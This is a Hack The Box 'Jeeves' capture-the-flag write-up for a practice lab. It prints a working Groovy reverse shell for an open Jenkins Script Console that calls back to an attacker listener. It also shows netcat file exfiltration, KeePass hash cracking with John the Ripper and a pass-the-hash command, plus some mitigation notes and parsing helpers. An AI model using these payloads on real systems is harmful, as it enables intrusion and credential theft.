Hack The Box Jeeves Writeup

Step 1: Nmap scan of the target

danger@V2Geeks:~/Dropbox/00/hTB/jeeves$ nmap -sC -sV -oA initial 10.10.10.63
# Nmap 7.70 scan initiated Thu May 24 18:01:53 2018 as: nmap -sC -sV -oA initial 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.18s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h00m00s, deviation: 0s, median: 4h59m59s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-24 23:02:50
|_  start_date: 2018-05-24 22:19:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 24 18:03:28 2018 -- 1 IP address (1 host up) scanned in 95.24 seconds

Two findings worth noting for a report even though the path below does not use them: SMB signing is disabled on SMB1 and only optional on SMB2, and IIS answers the TRACE method. The interesting services are IIS on port 80 and Jetty (which hosts Jenkins) on port 50000.



Step 2: http://10.10.10.63 (port 80)

The IIS site on port 80 is the "Ask Jeeves" search page that nmap reported as the HTTP title.

Step 3: http://10.10.10.63:50000 (port 50000)

Jetty on port 50000 returns "Error 404 Not Found" at the root, so both ports are enumerated for directories next.



Step 4: gobuster on port 80

danger@V2Geeks:~$ gobuster -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 80.txt

Explanation: enumerate directories under the web root with the dirbuster medium wordlist, 15 threads, writing results to 80.txt.

Step 5: gobuster on port 50000


danger@V2Geeks:~$ gobuster -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 50000.txt


Step 6: Important directory found

         /askjeeves (Status: 302)

The port 50000 scan returns /askjeeves. Open http://10.10.10.63:50000/askjeeves/ in a browser: it shows the Jenkins dashboard.
Step 7: Go to Dashboard -> Manage Jenkins -> Script Console.

Explanation: the console page itself states that Groovy scripts entered here are run on the Jenkins server. Anyone who can reach this console can run arbitrary code as the account Jenkins runs under, so in a real deployment it must be limited to authenticated administrators.

Step 8: Printing a Hello World message in Groovy

cmd = "cmd.exe /c echo Hello World"   // command string run on the Jenkins host

println cmd.execute().text            // print the command's output in the console




Step 9: Getting an initial shell
Start a netcat listener on port 8044:

danger@V2Geeks:~/Dropbox/00/hTB/jeeves/www$ nc -nlvp 8044
listening on [any] 8044 ...


Step 10: Start the initial shell

Paste the following into the Script Console (host and port are the listener from step 9):


String host="10.10.14.191"; 
int port=8044; 
String cmd="cmd.exe"; 
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Click Run. The listener receives the connection:

listening on [any] 8044 ...
10.10.10.63: inverse host lookup failed: Unknown host
connect to [10.10.14.191] from (UNKNOWN) [10.10.10.63] 49700
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>



C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke


C:\Users\Administrator\.jenkins>cd c:/users/kohsuke/Desktop

c:\Users\kohsuke\Desktop>dir
dir
 Directory of c:\Users\kohsuke\Desktop

11/03/2017  11:19 PM    <DIR>          .
11/03/2017  11:19 PM    <DIR>          ..
11/03/2017  11:22 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,269,990,400 bytes free


c:\Users\kohsuke\Desktop>type users.txt
type users.txt
The system cannot find the file specified.

c:\Users\kohsuke\Desktop>type user.txt
type user.txt
e3232272596fb47950d59c4cf1e7066a


c:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\kohsuke\Documents

11/03/2017  11:18 PM    <DIR>          .
11/03/2017  11:18 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   7,269,990,400 bytes free


To download CEH.kdbx, first upload nc.exe (netcat) to the Windows machine; the listing afterwards shows it next to the database:

c:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\kohsuke\Documents

06/09/2018  09:14 PM    <DIR>          .
06/09/2018  09:14 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx
06/09/2018  09:15 PM         1,667,584 nc.exe
               2 File(s)      1,670,430 bytes
               2 Dir(s)   7,267,651,584 bytes free




Then download CEH.kdbx to the Linux machine over netcat and confirm the size matches the 2,846 bytes seen on Windows:

danger@kali:~$ ls -la CEH.kdbx
-rw-r--r-- 1 danger danger 2846 Jun  9 16:40 CEH.kdbx



danger@kali:~$ apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
  Password manager

keepass2-doc/kali-rolling 2.38+dfsg-1 all
  Password manager - Documentation

keepassx/kali-rolling 2.0.3-1 amd64
  Cross Platform Password Manager

keepassxc/kali-rolling 2.3.1+dfsg.1-1 amd64
  Cross Platform Password Manager

kpcli/kali-rolling 3.1-3 all
  command line interface to KeePassX password manager databases

libfile-keepass-perl/kali-rolling 2.03-1 all
  interface to KeePass V1 and V2 database files



danger@kali:~$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48


keepass2john prefixes the database name (CEH:) to the hash; the writeup removes that prefix before cracking.

The final hash is:

$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

Write it to a new file named CEHjohnable and crack it with John the Ripper using the rockyou wordlist.



danger@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt CEHjohnable
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status

Wait about 5 minutes:
  moonshine1       (?)
1g 0:00:00:55 DONE (2018-06-09 17:55) 0.01789g/s 983.9p/s 983.9c/s 983.9C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

moonshine1 is the password for CEH.kdbx. A dictionary word plus a digit fell in under a minute at roughly 1000 candidates per second against 6000 key-transformation rounds, so the only real protection on this database was the master password; a long passphrase (and a higher round count) is what makes offline cracking impractical.
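As an added example that is not part of the original writeup, the Python below does in code what the text describes: it strips the `CEH:` prefix that keepass2john prepends, splits the KDBX 2.x hash shown on this page into named fields with size checks, and flags a low round count. The labels for the hex fields are assumed from the KDBX header layout, the third numeric field is left uninterpreted, and the 100000-round threshold is a constructed illustrative value.

```python
import re

# Hash line exactly as keepass2john printed it for CEH.kdbx on this page.
KEEPASS2JOHN_LINE = (
    "CEH:$keepass$*2*6000*222*"
    "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
    "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*"
    "393c97beafd8a820db9142a6a94f03f6*"
    "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
    "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)

# Expected byte lengths of the five hex fields of a KDBX 2.x hash
# (labels assumed from the KDBX header layout, not stated on the page).
HEX_FIELDS = [("master_seed", 32), ("transform_seed", 32), ("iv", 16),
              ("expected_start_bytes", 32), ("first_block", 32)]
HEX_RE = re.compile(r"^[0-9a-f]+$")

def strip_dbname(line):
    """Return (database name, bare hash). keepass2john prefixes NAME: to
    the hash; the writeup removes it before feeding the file to john."""
    name, sep, rest = line.partition(":$keepass$")
    if not sep:
        raise ValueError("not a keepass2john line")
    return name, "$keepass$" + rest

def parse_keepass_hash(line):
    """Split a $keepass$ hash into named fields and validate their sizes."""
    name, bare = strip_dbname(line)
    parts = bare.split("*")
    if parts[0] != "$keepass$" or len(parts) != 4 + len(HEX_FIELDS):
        raise ValueError("unexpected field count: %d" % len(parts))
    info = {"db_name": name, "version": int(parts[1]),
            "rounds": int(parts[2]), "field3": int(parts[3])}  # field3 not interpreted
    for (label, nbytes), hexval in zip(HEX_FIELDS, parts[4:]):
        if not HEX_RE.match(hexval) or len(hexval) != 2 * nbytes:
            raise ValueError("bad %s: expected %d bytes" % (label, nbytes))
        info[label] = bytes.fromhex(hexval)
    return info

def weak_kdf(info, min_rounds=100000):
    """Flag a low key-transformation round count. At 6000 rounds john ran
    ~1000 candidates/s on this box; the threshold is a constructed value."""
    return info["rounds"] < min_rounds
```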


danger@kali:~$ apt-get install keepassx


danger@kali:~$ keepassx CEH.kdbx


Enter the password (moonshine1) and click OK.







The database entry "Backup stuff" holds an NTLM hash for the Administrator account, which is used below with pass-the-hash:



danger@kali:~$ pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>


Pass-the-hash works here because the local Administrator's NTLM hash is accepted for a remote SMB logon; unique local administrator passwords (for example via LAPS), denying network logon to local accounts, and disabling NTLM where possible are the usual mitigations. Move to the Administrator's Desktop and list its contents:

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,267,586,048 bytes free


c:\Users\Administrator\Desktop>type hm.txt
type hm.txt

The flag is elsewhere.  Look deeper.




c:\Users\Administrator\Desktop>dir /r /a:
dir /r /a:
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   7,267,586,048 bytes free

Note: hm.txt carries an NTFS alternate data stream (ADS) named root.txt. `dir /r` lists streams as file:stream:$DATA, and the 34-byte stream is where the flag is; a plain `dir` never shows streams, which is why the earlier listing looked complete (the `/a:` switch additionally reveals the hidden desktop.ini).



c:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt

afbc5bd4b615a60648cec41c6ac92530


Root flag (root.txt) found!
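As an added example that is not from the original writeup, a Python function that scans `dir /r` output for alternate data streams like the hm.txt:root.txt one above and skips the Zone.Identifier stream Windows attaches to downloaded files. The listing is a constructed sample in the same layout as the page's output (the hm.txt lines match the page; report.docx is made up), and the set of benign stream names is an assumption.

```python
import re

# Constructed sample in the layout of "dir /r /a:" on this page.
# hm.txt and its root.txt stream match the page; report.docx is made up to
# show a benign Zone.Identifier stream that should not raise an alert.
DIR_R_OUTPUT = """\
 Directory of c:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
06/01/2018  09:00 AM             1,024 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               4 File(s)          2,139 bytes
               2 Dir(s)   7,267,586,048 bytes free
"""

# A stream line has no date/time column: only a size and NAME:STREAM:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+):([^:]+):\$DATA\s*$")
# Streams Windows itself writes to downloaded files (assumed benign list).
BENIGN_STREAMS = {"Zone.Identifier"}

def find_alternate_streams(listing, ignore_benign=True):
    """Return [(host_file, stream_name, size_bytes)] for each alternate data
    stream in `dir /r` output. Hidden files only appear when /a is also
    given, as on the page; plain dir output contains no stream lines."""
    found = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if not m:
            continue
        size, host, stream = m.groups()
        if ignore_benign and stream in BENIGN_STREAMS:
            continue
        found.append((host, stream, int(size.replace(",", ""))))
    return found
```

On a live host, PowerShell's `Get-Item -Path <file> -Stream *` lists the same streams without parsing dir output.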





